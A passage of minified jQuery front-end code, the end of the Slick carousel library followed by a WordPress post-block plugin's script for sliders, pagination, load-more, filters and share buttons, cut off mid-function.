d.animateHeight();!0!==i&&d.slideCount>d.options.slidesToShow?d.animateSlide(a,(function(){d.postSlide(o)})):d.postSlide(o)}},i.prototype.startLoad=function(){var t=this;!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&(t.$prevArrow.hide(),t.$nextArrow.hide()),!0===t.options.dots&&t.slideCount>t.options.slidesToShow&&t.$dots.hide(),t.$slider.addClass("slick-loading")},i.prototype.swipeDirection=function(){var t,e,i,s,o=this;return t=o.touchObject.startX-o.touchObject.curX,e=o.touchObject.startY-o.touchObject.curY,i=Math.atan2(e,t),(s=Math.round(180*i/Math.PI))<0&&(s=360-Math.abs(s)),s<=45&&s>=0||s<=360&&s>=315?!1===o.options.rtl?"left":"right":s>=135&&s<=225?!1===o.options.rtl?"right":"left":!0===o.options.verticalSwiping?s>=35&&s<=135?"down":"up":"vertical"},i.prototype.swipeEnd=function(t){var e,i,s=this;if(s.dragging=!1,s.swiping=!1,s.scrolling)return s.scrolling=!1,!1;if(s.interrupted=!1,s.shouldClick=!(s.touchObject.swipeLength>10),void 0===s.touchObject.curX)return!1;if(!0===s.touchObject.edgeHit&&s.$slider.trigger("edge",[s,s.swipeDirection()]),s.touchObject.swipeLength>=s.touchObject.minSwipe){switch(i=s.swipeDirection()){case"left":case"down":e=s.options.swipeToSlide?s.checkNavigable(s.currentSlide+s.getSlideCount()):s.currentSlide+s.getSlideCount(),s.currentDirection=0;break;case"right":case"up":e=s.options.swipeToSlide?s.checkNavigable(s.currentSlide-s.getSlideCount()):s.currentSlide-s.getSlideCount(),s.currentDirection=1}"vertical"!=i&&(s.slideHandler(e),s.touchObject={},s.$slider.trigger("swipe",[s,i]))}else s.touchObject.startX!==s.touchObject.curX&&(s.slideHandler(s.currentSlide),s.touchObject={})},i.prototype.swipeHandler=function(t){var e=this;if(!(!1===e.options.swipe||"ontouchend"in document&&!1===e.options.swipe||!1===e.options.draggable&&-1!==t.type.indexOf("mouse")))switch(e.touchObject.fingerCount=t.originalEvent&&void 0!==t.originalEvent.touches?t.originalEvent.touches.length:1,e.touchObject.minSwipe=e.listWidth/e.options.touchThreshold,!0===e.options.verticalSwiping&&(e.touchObject.minSwipe=e.listHeight/e.options.touchThreshold),t.data.action){case"start":e.swipeStart(t);break;case"move":e.swipeMove(t);break;case"end":e.swipeEnd(t)}},i.prototype.swipeMove=function(t){var e,i,s,o,l,n,a=this;return l=void 0!==t.originalEvent?t.originalEvent.touches:null,!(!a.dragging||a.scrolling||l&&1!==l.length)&&(e=a.getLeft(a.currentSlide),a.touchObject.curX=void 0!==l?l[0].pageX:t.clientX,a.touchObject.curY=void 0!==l?l[0].pageY:t.clientY,a.touchObject.swipeLength=Math.round(Math.sqrt(Math.pow(a.touchObject.curX-a.touchObject.startX,2))),n=Math.round(Math.sqrt(Math.pow(a.touchObject.curY-a.touchObject.startY,2))),!a.options.verticalSwiping&&!a.swiping&&n>4?(a.scrolling=!0,!1):(!0===a.options.verticalSwiping&&(a.touchObject.swipeLength=n),i=a.swipeDirection(),void 0!==t.originalEvent&&a.touchObject.swipeLength>4&&(a.swiping=!0,t.preventDefault()),o=(!1===a.options.rtl?1:-1)*(a.touchObject.curX>a.touchObject.startX?1:-1),!0===a.options.verticalSwiping&&(o=a.touchObject.curY>a.touchObject.startY?1:-1),s=a.touchObject.swipeLength,a.touchObject.edgeHit=!1,!1===a.options.infinite&&(0===a.currentSlide&&"right"===i||a.currentSlide>=a.getDotCount()&&"left"===i)&&(s=a.touchObject.swipeLength*a.options.edgeFriction,a.touchObject.edgeHit=!0),!1===a.options.vertical?a.swipeLeft=e+s*o:a.swipeLeft=e+s*(a.$list.height()/a.listWidth)*o,!0===a.options.verticalSwiping&&(a.swipeLeft=e+s*o),!0!==a.options.fade&&!1!==a.options.touchMove&&(!0===a.animating?(a.swipeLeft=null,!1):void a.setCSS(a.swipeLeft))))},i.prototype.swipeStart=function(t){var e,i=this;if(i.interrupted=!0,1!==i.touchObject.fingerCount||i.slideCount<=i.options.slidesToShow)return i.touchObject={},!1;void 0!==t.originalEvent&&void 0!==t.originalEvent.touches&&(e=t.originalEvent.touches[0]),i.touchObject.startX=i.touchObject.curX=void 0!==e?e.pageX:t.clientX,i.touchObject.startY=i.touchObject.curY=void 0!==e?e.pageY:t.clientY,i.dragging=!0},i.prototype.unfilterSlides=i.prototype.slickUnfilter=function(){var t=this;null!==t.$slidesCache&&(t.unload(),t.$slideTrack.children(this.options.slide).detach(),t.$slidesCache.appendTo(t.$slideTrack),t.reinit())},i.prototype.unload=function(){var e=this;t(".slick-cloned",e.$slider).remove(),e.$dots&&e.$dots.remove(),e.$prevArrow&&e.htmlExpr.test(e.options.prevArrow)&&e.$prevArrow.remove(),e.$nextArrow&&e.htmlExpr.test(e.options.nextArrow)&&e.$nextArrow.remove(),e.$slides.removeClass("slick-slide slick-active slick-visible slick-current").attr("aria-hidden","true").css("width","")},i.prototype.unslick=function(t){var e=this;e.$slider.trigger("unslick",[e,t]),e.destroy()},i.prototype.updateArrows=function(){var t=this;Math.floor(t.options.slidesToShow/2),!0===t.options.arrows&&t.slideCount>t.options.slidesToShow&&!t.options.infinite&&(t.$prevArrow.removeClass("slick-disabled").attr("aria-disabled","false"),t.$nextArrow.removeClass("slick-disabled").attr("aria-disabled","false"),0===t.currentSlide?(t.$prevArrow.addClass("slick-disabled").attr("aria-disabled","true"),t.$nextArrow.removeClass("slick-disabled").attr("aria-disabled","false")):(t.currentSlide>=t.slideCount-t.options.slidesToShow&&!1===t.options.centerMode||t.currentSlide>=t.slideCount-1&&!0===t.options.centerMode)&&(t.$nextArrow.addClass("slick-disabled").attr("aria-disabled","true"),t.$prevArrow.removeClass("slick-disabled").attr("aria-disabled","false")))},i.prototype.updateDots=function(){var t=this;null!==t.$dots&&(t.$dots.find("li").removeClass("slick-active").end(),t.$dots.find("li").eq(Math.floor(t.currentSlide/t.options.slidesToScroll)).addClass("slick-active"))},i.prototype.visibility=function(){var t=this;t.options.autoplay&&(document[t.hidden]?t.interrupted=!0:t.interrupted=!1)},t.fn.slick=function(){var t,e,s=this,o=arguments[0],l=Array.prototype.slice.call(arguments,1),n=s.length;for(t=0;t<n;t++)if("object"==typeof o||void 0===o?s[t].slick=new i(s[t],o):e=s[t].slick[o].apply(s[t].slick,l),void 0!==e)return e;return s}})),function(t){"use strict";const e=0==t("body.postx-admin-page").length;function i(){t(document).scrollTop()>1e3?(t(".ultp-toc-backtotop").addClass("tocshow"),t(".wp-block-ultimate-post-table-of-content").addClass("ultp-toc-scroll")):(t(".ultp-toc-backtotop").removeClass("tocshow"),t(".wp-block-ultimate-post-table-of-content").removeClass("ultp-toc-scroll"))}function s(t,e,i){e==i?t.find(".ultp-next-page-numbers").hide():t.find(".ultp-next-page-numbers").show(),e>1?t.find(".ultp-prev-page-numbers").show():t.find(".ultp-prev-page-numbers").hide(),e>3?t.find(".ultp-first-dot").show():t.find(".ultp-first-dot").hide(),e>2?t.find(".ultp-first-pages").show():t.find(".ultp-first-pages").hide(),i>e+2?t.find(".ultp-last-dot").show():t.find(".ultp-last-dot").hide(),i>e+1?t.find(".ultp-last-pages").show():t.find(".ultp-last-pages").hide()}function o(e,i,s){let o=i<=2?[1,2,3]:s==i?[s-2,s-1,s]:[i-1,i,i+1],l=0;e.find(".ultp-center-item").each((function(){i==o[l]&&t(this).addClass("pagination-active"),t(this).find("a").blur(),t(this).attr("data-current",o[l]).find("a").text(o[l]),l++})),e.find(".ultp-prev-page-numbers a").blur(),e.find(".ultp-next-page-numbers a").blur()}function l(t,e){null!=e&&sessionStorage.setItem(t,e)}function n(){t(".wp-block-ultimate-post-post-slider-1, .wp-block-ultimate-post-post-slider-2").each((function(){const e="#"+t(this).attr("id");let i=t(e).find(".ultp-block-items-wrap");t(this).parent(".ultp-shortcode")&&(i=t(this).find(".ultp-block-items-wrap"));let s={arrows:!0,dots:!!i.data("dots"),infinite:!0,speed:500,slidesToShow:i.data("slidelg")||1,slidesToScroll:1,autoplay:!!i.data("autoplay"),autoplaySpeed:i.data("slidespeed")||3e3,cssEase:"linear",prevArrow:i.parent().find(".ultp-slick-prev").html(),nextArrow:i.parent().find(".ultp-slick-next").html()},o="slide2"==i.data("layout")||"slide3"==i.data("layout")||"slide5"==i.data("layout")||"slide6"==i.data("layout")||"slide8"==i.data("layout");i.data("layout")?i.data("fade")&&o?s.fade=!!i.data("fade"):!i.data("fade")&&o?(s.slidesToShow=i.data("slidelg")||1,s.responsive=[{breakpoint:991,settings:{slidesToShow:i.data("slidesm")||1,slidesToScroll:1}},{breakpoint:767,settings:{slidesToShow:i.data("slidexs")||1,slidesToScroll:1}}]):(s.slidesToShow=i.data("slidelg")||1,s.centerMode=!0,s.centerPadding=`${i.data("paddlg")}px`||100,s.responsive=[{breakpoint:991,settings:{slidesToShow:i.data("slidesm")||1,slidesToScroll:1,centerPadding:`${i.data("paddsm")}px`||50}},{breakpoint:767,settings:{slidesToShow:i.data("slidexs")||1,slidesToScroll:1,centerPadding:`${i.data("paddxs")}px`||50}}]):i.data("slidelg")<2?s.fade=!!i.data("fade"):s.responsive=[{breakpoint:1024,settings:{slidesToShow:i.data("slidesm")||1,slidesToScroll:1}},{breakpoint:600,settings:{slidesToShow:i.data("slidexs")||1,slidesToScroll:1}}],i.not(".slick-initialized").slick(s)}))}t(".ultp-post-share-item a").each((function(){t(this).on("click",(function(){let e,i,s=t(this).attr("url");e=window.screen.width/2-410,i=window.screen.height/2-300;let o="height=500,width=800,resizable=yes,left="+e+",top="+i+",screenX="+e+",screenY="+i;window.open(s,"sharer",o);let l=t(this).parents(".ultp-post-share-item-inner-block").attr("postId"),n=t(this).parents(".ultp-post-share-item-inner-block").attr("count");return t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_share_count",shareCount:n,postId:l,wpnonce:ultp_data_frontend.security},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText)}}),!1}))})),t(window).on("scroll",(function(){t(window).scrollTop()+window.innerHeight>=t("footer")?.offset()?.top?t(".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer").addClass("remove-sticky"):t(".wp-block-ultimate-post-post_share .ultp-block-wrapper .ultp-disable-sticky-footer").removeClass("remove-sticky")})),t(".ultp-news-ticker").each((function(){t(this).UltpSlider({type:t(this).data("type"),direction:t(this).data("direction"),speed:t(this).data("speed"),pauseOnHover:1==t(this).data("hover"),controls:{prev:t(this).closest(".ultp-newsTicker-wrap").find(".ultp-news-ticker-prev"),next:t(this).closest(".ultp-newsTicker-wrap").find(".ultp-news-ticker-next"),toggle:t(this).closest(".ultp-newsTicker-wrap").find(".ultp-news-ticker-pause")}})})),t(".ultp-toc-backtotop").on("click",(function(e){e.preventDefault(),t("html, body").animate({scrollTop:0},"slow")})),t(window).on("scroll",(function(){i()})),i(),t(".ultp-collapsible-open").on("click",(function(e){t(this).closest(".ultp-collapsible-toggle").removeClass("ultp-toggle-collapsed"),t(this).parents(".ultp-block-toc").find(".ultp-block-toc-body").show()})),t(".ultp-collapsible-hide").on("click",(function(e){t(this).closest(".ultp-collapsible-toggle").addClass("ultp-toggle-collapsed"),t(this).parents(".ultp-block-toc").find(".ultp-block-toc-body").hide()})),t(".ultp-toc-lists li a").on("click",(function(){t([document.documentElement,document.body]).animate({scrollTop:t(t(this).attr("href")).offset().top-50},500)})),t(document).ready((function(){if(t(".ultp-flex-menu").length>0){const e=t("ul.ultp-flex-menu").data("name");t("ul.ultp-flex-menu").flexMenu({linkText:e,linkTextAll:e,linkTitle:e})}})),t(document).on("click",(function(e){0===t(e.target).closest(".flexMenu-viewMore").length&&(t(".flexMenu-viewMore").removeClass("active"),t(".flexMenu-viewMore").children("ul.flexMenu-popup").css("display","none"))})),t(document).on("click",".ultp-filter-navigation .flexMenu-popup .filter-item",(function(e){t(".flexMenu-viewMore").removeClass("active"),t(".flexMenu-viewMore").children("ul.flexMenu-popup").css("display","none")})),t(".ultp-post-grid-parent").each((function(){const e=t(this).find(".ultp-post-grid-block"),i=t(this).find(".ultp-pagination-block"),s=e.find(".pagination-block-html > div");i.length<1||s.length<1||(i.attr("class").split(" ").forEach((t=>{s.addClass(t)})),i.html(s))})),t(document).off("click",".ultp-pagination-ajax-action li, .ultp-loadmore-action, .ultp-prev-action, .ultp-next-action",(function(t){})),t(document).on("click",".ultp-prev-action, .ultp-next-action",(function(e){e.preventDefault();let i=t(this).closest(".ultp-next-prev-wrap"),s=i.closest(".ultp-block-wrapper").find(".ultp-block-items-wrap"),o=parseInt(i.data("pagenum")),n=parseInt(i.data("pages")),a=i.closest(".ultp-block-wrapper");const r=i.parents(".ultp-post-grid-parent");if(s.length<1){const e=i.data("for");e&&(s=t("."+e+" .ultp-block-items-wrap"))}if(i.is(".ultp-disable-editor-click"))return;if(t(this).hasClass("ultp-prev-action")){if(t(this).hasClass("ultp-disable"))return;o--,i.data("pagenum",o),i.find(".ultp-prev-action, .ultp-next-action").removeClass("ultp-disable"),1==o&&t(this).addClass("ultp-disable")}if(t(this).hasClass("ultp-next-action")){if(t(this).hasClass("ultp-disable"))return;o++,i.data("pagenum",o),i.find(".ultp-prev-action, .ultp-next-action").removeClass("ultp-disable"),o==n&&t(this).addClass("ultp-disable")}let d=0!=i.parents(".ultp-shortcode").length&&"no"==i.data("selfpostid")?i.parents(".ultp-shortcode").data("postid"):i.data("postid");t(this).closest(".ultp-builder-content").length>0&&(d=t(this).closest(".ultp-builder-content").data("postid"));let c="",p=t(this).parents(".widget_block:first");if(p.length>0){let t=p.attr("id").split("-");c=t[t.length-1]}const h=sessionStorage.getItem("ultp_uniqueIds"),f=JSON.stringify(s.find(".ultp-current-unique-posts").data("current-unique-posts")),m=i.data("filter-value")||"",g={};Array.isArray(m)&&m.length>0&&(g.filterShow=!0,g.checkFilter=!0,g.isAdv=!0,g.author=i.data("filter-author")||"",g.order=i.data("filter-order")||"",g.orderby=i.data("filter-orderby")||"",g.adv_sort=i.data("filter-adv-sort")||""),t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_next_prev",paged:o,blockId:i.data("blockid"),postId:d,exclude:i.data("expost"),blockName:i.data("blockname"),builder:i.data("builder"),filterValue:m,filterType:i.data("filter-type")||"",widgetBlockId:c,ultpUniqueIds:h||[],ultpCurrentUniquePosts:f||[],...g,wpnonce:ultp_data_frontend.security},beforeSend:function(){a.length<1&&r.length>0?r.find(".ultp-block-wrapper").addClass("ultp-loading-active"):a.addClass("ultp-loading-active")},success:function(e){e&&(s.html(e),l("ultp_uniqueIds",JSON.stringify(s.find(".ultp-current-unique-posts").data("ultp-unique-ids"))),t(window).scrollTop()>s.offset().top&&t([document.documentElement,document.body]).animate({scrollTop:s.offset().top-80},100))},complete:function(){a.length<1&&r.length>0?r.find(".ultp-block-wrapper").removeClass("ultp-loading-active"):a.removeClass("ultp-loading-active"),u()},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),i.closest(".ultp-block-wrapper").removeClass("ultp-loading-active")}})})),t(document).on("click",".ultp-loadmore-action",(function(e){if(t(this).is(".ultp-disable-editor-click"))return;e.preventDefault();let i=t(this),s=i.closest(".ultp-block-wrapper"),o=!1;if(s.length<1){const e=i.data("for");e&&(s=t("."+e+" .ultp-block-wrapper"),o=s.length>0)}let n=parseInt(i.data("pagenum")),a=parseInt(i.data("pages"));if(i.hasClass("ultp-disable"))return;n++,i.data("pagenum",n),n==a?t(this).addClass("ultp-disable"):t(this).removeClass("ultp-disable");let r=0!=i.parents(".ultp-shortcode").length&&"no"==i.data("selfpostid")?i.parents(".ultp-shortcode").data("postid"):i.data("postid");i.closest(".ultp-builder-content").length>0&&(r=i.closest(".ultp-builder-content").data("postid"));let d="",c=t(this).parents(".widget_block:first");if(c.length>0){let t=c.attr("id").split("-");d=t[t.length-1]}const p=sessionStorage.getItem("ultp_uniqueIds"),u=JSON.stringify(s.find(".ultp-current-unique-posts").data("current-unique-posts")),h=i.data("filter-value")||"",f={};Array.isArray(h)&&h.length>0&&(f.filterShow=!0,f.checkFilter=!0,f.isAdv=!0,f.author=i.data("filter-author")||"",f.order=i.data("filter-order")||"",f.orderby=i.data("filter-orderby")||"",f.adv_sort=i.data("filter-adv-sort")||""),t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_next_prev",paged:n,blockId:i.data("blockid"),postId:r,blockName:i.data("blockname"),builder:i.data("builder"),exclude:i.data("expost"),filterValue:h,filterType:i.data("filter-type")||"",widgetBlockId:d,ultpUniqueIds:p||[],ultpCurrentUniquePosts:u||[],...f,wpnonce:ultp_data_frontend.security},beforeSend:function(){s.addClass("ultp-loading-active"),o&&i.find(".ultp-spin").css("display","flex")},success:function(e){if(e){s.find(".ultp-block-row").css("max-height","unset"),s.find(".ultp-current-unique-posts").remove();const o=s.find(".ultp-loadmore-insert-before");if(o.length)i.data("blockname").includes("post-module")&&t('<div style="clear:left;width:100%;padding-block:15px;"></div>').insertBefore(o),t(e).insertBefore(o);else{const o=s.find(".ultp-block-items-wrap");i.data("blockname").includes("post-module")&&o.append(t('<div style="clear:left;width:100%;padding-block:15px;"></div>')),o.append(e)}l("ultp_uniqueIds",JSON.stringify(s.find(".ultp-current-unique-posts").data("ultp-unique-ids")))}},complete:function(){s.removeClass("ultp-loading-active"),o&&i.find(".ultp-spin").css("display","none")},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),s.removeClass("ultp-loading-active"),o&&i.find(".ultp-spin").css("display","none")}})})),t(document).on("click",".ultp-filter-wrap li a",(function(e){if(e.preventDefault(),t(this).closest("li").hasClass("filter-item")){let e=t(this),i=e.closest(".ultp-filter-wrap"),s=e.closest(".ultp-block-wrapper");const o=e.parents(".ultp-post-grid-parent");if(i.find("a").removeClass("filter-active"),e.addClass("filter-active"),i.is(".ultp-disable-editor-click"))return;let n=0!=i.parents(".ultp-shortcode").length&&"no"==i.data("selfpostid")?i.parents(".ultp-shortcode").data("postid"):i.data("postid");e.closest(".ultp-builder-content").length>0&&(n=e.closest(".ultp-builder-content").data("postid"));let a="",r=t(this).parents(".widget_block:first");if(r.length>0){let t=r.attr("id").split("-");a=t[t.length-1]}const d=sessionStorage.getItem("ultp_uniqueIds"),c=JSON.stringify(s.find(".ultp-current-unique-posts").data("current-unique-posts"));i.data("blockid")&&t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_filter",taxtype:i.data("taxtype"),taxonomy:e.data("taxonomy"),blockId:i.data("blockid"),postId:n,blockName:i.data("blockname"),widgetBlockId:a,ultpUniqueIds:d||[],ultpCurrentUniquePosts:c||[],wpnonce:ultp_data_frontend.security},beforeSend:function(){s.addClass("ultp-loading-active")},success:function(e){s.find(".ultp-block-items-wrap").html(e?.data?.filteredData?.blocks),"loadMore"==e?.data?.filteredData?.paginationType&&e?.data?.filteredData?.paginationShow?s.find(".ultp-loadmore").replaceWith(e?.data?.filteredData?.pagination):"navigation"==e?.data?.filteredData?.paginationType?s.find(".ultp-next-prev-wrap").replaceWith(e?.data?.filteredData?.pagination):"pagination"==e?.data?.filteredData?.paginationType&&s.find(".ultp-pagination-wrap").replaceWith(e?.data?.filteredData?.pagination),e?.data?.filteredData?.pagination&&o.length>0&&o.data("pagi")?.map((i=>{let s=[];if("loadMore"===e?.data?.filteredData?.paginationType?(s=t(".ultp-loadmore."+i),s.length):s=t("."+i+"[data-for]"),s.length>0){const i=t(e.data.filteredData.pagination);s.attr("class").split(" ").forEach((t=>i.addClass(t))),s.replaceWith(i)}}))},complete:function(){s.removeClass("ultp-loading-active"),l("ultp_uniqueIds",JSON.stringify(s.find(".ultp-current-unique-posts").data("ultp-unique-ids"))),u()},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),s.removeClass("ultp-loading-active")}})}})),t(".ultp-current-unique-posts").length>0&&t(".ultp-current-unique-posts").each((function(){l("ultp_uniqueIds",JSON.stringify(t(this).data("ultp-unique-ids")))})),t(document).on("click",".ultp-pagination-ajax-action li",(function(e){e.preventDefault();let i=t(this),n=i.closest(".ultp-pagination-ajax-action"),a=i.closest(".ultp-block-wrapper");const r=n.attr("data-blockid");if(a.length<1){const e=n.data("for");e&&(a=t("."+e+" .ultp-block-wrapper"))}if(n.is(".ultp-disable-editor-click"))return;let d=1,c=n.attr("data-pages");i.attr("data-current")?(d=Number(i.attr("data-current")),n.attr("data-paged",d).find("li").removeClass("pagination-active"),o(n,d,c),s(n,d,c)):i.hasClass("ultp-prev-page-numbers")?(d=Number(n.attr("data-paged"))-1,n.attr("data-paged",d).find("li").removeClass("pagination-active"),o(n,d,c),s(n,d,c)):i.hasClass("ultp-next-page-numbers")&&(d=Number(n.attr("data-paged"))+1,n.attr("data-paged",d).find("li").removeClass("pagination-active"),o(n,d,c),s(n,d,c));let p=0!=n.parents(".ultp-shortcode").length&&"no"==n.data("selfpostid")?n.parents(".ultp-shortcode").data("postid"):n.data("postid");i.closest(".ultp-builder-content").length>0&&(p=i.closest(".ultp-builder-content").data("postid"));let h="",f=t(this).parents(".widget_block:first");if(f.length>0){let t=f.attr("id").split("-");h=t[t.length-1]}const m=sessionStorage.getItem("ultp_uniqueIds"),g=JSON.stringify(a.find(".ultp-current-unique-posts").data("current-unique-posts")),v=n.data("filter-value")||"",b={};Array.isArray(v)&&v.length>0&&(b.filterShow=!0,b.checkFilter=!0,b.isAdv=!0,b.author=n.data("filter-author")||"",b.order=n.data("filter-order")||"",b.orderby=n.data("filter-orderby")||"",b.adv_sort=n.data("filter-adv-sort")||""),d&&(r&&function(t,e,i){const s=new URLSearchParams(window.location.search);s.set(`${t}_page`,e);const o=window.location.pathname+"?"+s.toString();window.history.replaceState({page:{[t]:i}},document.title,o)}(r,d,function(t){const e=new URLSearchParams(window.location.search).get(t+"_page");return e?+e:1}(r)),t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{exclude:n.data("expost"),action:"ultp_pagination",paged:d,blockId:n.data("blockid"),postId:p,blockName:n.data("blockname"),builder:n.data("builder"),widgetBlockId:h,ultpUniqueIds:m||[],ultpCurrentUniquePosts:g||[],filterType:n.data("filter-type")||"",filterValue:v,...b,wpnonce:ultp_data_frontend.security},beforeSend:function(){a.addClass("ultp-loading-active")},success:function(e){a.find(".ultp-block-items-wrap").html(e),l("ultp_uniqueIds",JSON.stringify(a.find(".ultp-current-unique-posts").data("ultp-unique-ids"))),t(window).scrollTop()>a.offset().top&&t([document.documentElement,document.body]).animate({scrollTop:a.offset().top-80},100)},complete:function(){a.removeClass("ultp-loading-active"),u()},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),a.removeClass("ultp-loading-active")}}))})),t(window).on("elementor/frontend/init",(()=>{setTimeout((()=>{t(".elementor-editor-active").length>0&&n()}),2e3)})),t(".bricks-builder-iframe").length>0&&t(window.parent.document).find(".bricks-panel-controls").length>0&&setTimeout((()=>{n()}),2500),n(),t('span[role="button"].ultp-loadmore-action').on("keydown",(function(t){const e=void 0!==t.key?t.key:t.keyCode;("Enter"===e||13===e||["Spacebar"," "].indexOf(e)>=0||32===e)&&(t.preventDefault(),this.click())}));let a=!0;function r(t){switch(t){case"categories":return"category";case"tag":case"tags":return"post_tag";case"authors":return"author";case"order_by":return"orderby";default:return t}}t(window).on("scroll",(function(){let e=t(this).scrollTop();t(".wp-block-ultimate-post-post-image").each((function(){let i=t(this).find(".ultp-builder-video video , .ultp-builder-video iframe");if(t(this).find(".ultp-video-block").hasClass("ultp-sticky-video")){let s=t(this).find(".ultp-image-wrapper"),o=s.offset(),l=i.height(),n=i.offset(),r=e+(t("#wpadminbar").height()||0),d=n.top+l;r>n.top&&r>d&&a&&(t(this).find(".ultp-image-wrapper").css("height",s.height()),t(this).find(".ultp-sticky-video").addClass("ultp-sticky-active")),r<s.height()+o.top&&(t(this).find(".ultp-sticky-video").removeClass("ultp-sticky-active"),t(this).find(".ultp-image-wrapper").css("height","auto")),t(".ultp-sticky-close").on("click",(function(){t(this).find(".ultp-image-wrapper").css("height","auto"),t(".ultp-sticky-video").removeClass("ultp-sticky-active"),a=!1}))}}))})),t(".ultp-filter-block").each((function(){const e=t(this),i=t(this).parents(".ultp-post-grid-parent"),s=i.find(".ultp-block-wrapper"),o=JSON.parse(i.attr("data-grids")),n=i.attr("data-postid"),a=t(this).find(".ultp-filter-clear-template"),d=t(this).find(".ultp-filter-clear-button"),c="ultp-block-"+d.data("blockid")+"-first";function p(){o.forEach((e=>{!function(e,i,s,o,n){const a=[],d={},c=e.data("pagi");e.find(".ultp-filter-select").each((function(){const e=t(this).attr("data-type"),i=t(this).attr("data-selected"),s=t(this).find('.ultp-filter-select__dropdown-inner[data-id="'+i+'"]').data("tax");"author"!==r(e)?"order"!==r(e)?"orderby"!==r(e)?"adv_sort"!==r(e)?"custom_tax"!==r(e)?a.push({value:r(e)+"###"+i}):s&&a.push({value:s+"###"+i}):d.adv_sort=i:d.orderby=i:d.order=i:"_all"!==i&&(d.author=[{value:i}])})),e.find('.ultp-filter-button[data-is-active="true"]').each((function(){const e=t(this).attr("data-type"),i=t(this).attr("data-selected"),s=t(this).attr("data-tax");"author"!==r(e)?"order"!==r(e)?"orderby"!==r(e)?"adv_sort"!==r(e)?"custom_tax"!==r(e)?a.push({value:r(e)+"###"+i}):s&&a.push({value:s+"###"+i}):d.adv_sort=i:d.orderby=i:d.order=i:"_all"!==i&&(d.author=[{value:i}])})),d.taxonomy=a;const p=e.find(".ultp-filter-search input");p.length>0&&(d.search=p.val());const u=sessionStorage.getItem("ultp_uniqueIds"),h=JSON.stringify(e.find(".ultp-current-unique-posts").data("current-unique-posts"));let f="",m=e.parents(".widget_block:first");if(m.length>0){let t=m.attr("id").split("-");f=t[t.length-1]}t(n).each((function(){const n=t(this);t.ajax({url:ultp_data_frontend.ajax,type:"POST",data:{action:"ultp_adv_filter",...d,blockId:i,blockName:s,postId:o,ultpUniqueIds:u||[],ultpCurrentUniquePosts:h||[],widgetBlockId:f,wpnonce:ultp_data_frontend.security},beforeSend:function(){n.addClass("ultp-loading-active")},success:function(e){n.closest(".wp-block-ultimate-post-post-grid-parent")?.find(".ultp-not-found-message")?.remove(),""===e?.data?.filteredData?.blocks&&e?.data?.filteredData?.notFound&&n.closest(".wp-block-ultimate-post-post-grid-parent").append('<div class="ultp-not-found-message" role="alert">'+e?.data?.filteredData?.notFound+"</div>"),n.find(".ultp-block-items-wrap").html(e?.data?.filteredData?.blocks),"loadMore"==e?.data?.filteredData?.paginationType&&e?.data?.filteredData?.paginationShow?n.find(".ultp-loadmore").replaceWith(e?.data?.filteredData?.pagination):"navigation"==e?.data?.filteredData?.paginationType?n.find(".ultp-next-prev-wrap").replaceWith(e?.data?.filteredData?.pagination):"pagination"==e?.data?.filteredData?.paginationType&&n.find(".ultp-pagination-wrap").replaceWith(e?.data?.filteredData?.pagination),e?.data?.filteredData?.pagination&&c?.map((i=>{let s=[];if("loadMore"===e?.data?.filteredData?.paginationType?(s=t(".ultp-loadmore."+i),s.length):s=t("."+i+"[data-for]"),s.length>0){const i=t(e.data.filteredData.pagination);s.attr("class").split(" ").forEach((t=>i.addClass(t))),s.replaceWith(i)}}))},complete:function(){n.removeClass("ultp-loading-active"),l("ultp_uniqueIds",JSON.stringify(e.find(".ultp-current-unique-posts").data("ultp-unique-ids")))},error:function(t){console.log("Error occured.please try again"+t.statusText+t.responseText),n.removeClass("ultp-loading-active")}})}))}(i,e.blockId,e.name,n,s)}))}let u;function h(t){clearTimeout(u),u=t?setTimeout(p,500):p()}e.find(".ultp-filter-select").each((function(){const i=t(this).find(".ultp-filter-select-options"),s=t(this).find(".ultp-filter-select-field-selected"),o=t(this).find(".ultp-filter-select-field-icon"),l=t(this),n=t(this).attr("data-type"),r=t(this).find(".ultp-filter-select-search");function u(e){e?(t(".ultp-filter-select .ultp-filter-select-options").css("display","none"),t(".ultp-filter-select .ultp-filter-select-field-icon").removeClass("ultp-dropdown-icon-rotate"),t(".ultp-filter-select").attr("aria-expanded",!1),i.css("display","block"),o.addClass("ultp-dropdown-icon-rotate")):(i.css("display","none"),o.removeClass("ultp-dropdown-icon-rotate")),l.attr("aria-expanded",e)}const h=i.find("li").first();t(this).on("click",(function(t){t.stopPropagation(),u("none"===i.css("display"))})),t(i).find("li").each((function(){const i=t(this).attr("data-id"),o=t(this).attr("data-blockId"),r=t(this).text();t(this).on("click",(function(){if(s.text(r),l.attr("data-selected",i),"_all"===i)e.find(`.ultp-filter-clear[data-type="${n}"]`).remove();else if(d.length>0){let t=!1,u=e.find(`.ultp-filter-clear[data-type="${n}"]`);u.length<1&&(t=!0,u=a.clone()),u.removeClass("ultp-filter-clear-template"),u.addClass("ultp-filter-clear-selected-filter"),u.find(".ultp-selected-filter-text").text(function(t,e){return`${t.replace("_"," ").replace(/\b\w/g,(t=>t.toUpperCase()))}: ${e}`}(n,r)),d.hasClass(c)&&(d.removeClass(c),u.addClass(c)),u.find(".ultp-selected-filter-icon").on("click",(function(){s.text(h.text()),l.attr("data-selected",h.attr("data-id")),u.hasClass(c)&&(u.next().hasClass("ultp-filter-clear-selected-filter")?u.next().addClass(c):d.addClass(c)),u.remove(),p()})),u.attr("data-id",i),u.attr("data-type",n),u.attr("data-for",o),u.css({display:"block"}),t&&u.insertBefore(d)}p(),u(!0)}))})),r.on("click",(function(t){t.preventDefault(),t.stopPropagation()})),r.on("input",(function(e){const s=String(e.target.value).toLowerCase();s.length>0?i.find("li").each((function(){const e=t(this).text();t(this).css("display",e.toLowerCase().includes(s)?"list-item":"none")})):i.find("li").each((function(){t(this).css("display","list-item")}))})),t(document).on("click",(function(t){l.is(t.target)||l.has(t.target).length||u(!1)}))})),e.find(".ultp-filter-button").each((function(){const 